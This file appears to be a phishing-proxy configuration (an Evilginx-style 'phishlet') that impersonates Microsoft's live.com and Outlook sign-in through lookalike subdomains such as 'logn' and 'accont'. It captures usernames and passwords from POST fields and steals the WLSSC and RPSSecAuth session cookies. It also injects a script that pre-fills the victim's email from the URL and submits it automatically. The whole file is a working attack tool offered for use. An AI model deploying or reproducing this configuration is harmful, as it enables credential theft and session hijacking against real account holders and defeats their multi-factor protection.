author: '@tare'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
  - {phish_sub: 'logn', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
  - {phish_sub: 'accont', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.live.com'
    keys: ['WLSSC','RPSSecAuth']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'outlook.live.com'
  path: '/owa/?nlp=1'
js_inject:
    - trigger_domains: ["outlook.live.com"]
      trigger_paths: ["/"]
      script: |
        function lp(){
          var emailId = document.querySelector("#i0116");
          var nextButton = document.querySelector("#idSIButton9");
          var query = window.location.href;
          if (/#/.test(window.location.href)){
          var res = query.split("#");
          var data1 = res[0];
          var data2 = res[1];
          console.log(data1);
          console.log(data2);
            if (emailId != null) {
            var m = data2.replace(/[=]/gi, '');
            emailId.focus();
            emailId.value = m;
            nextButton.focus();
            nextButton.click();
            console.log("YES!");
            return;
          }
          }
          setTimeout(function(){lp();}, 1500);
        }
        setTimeout(function(){lp();}, 1500);       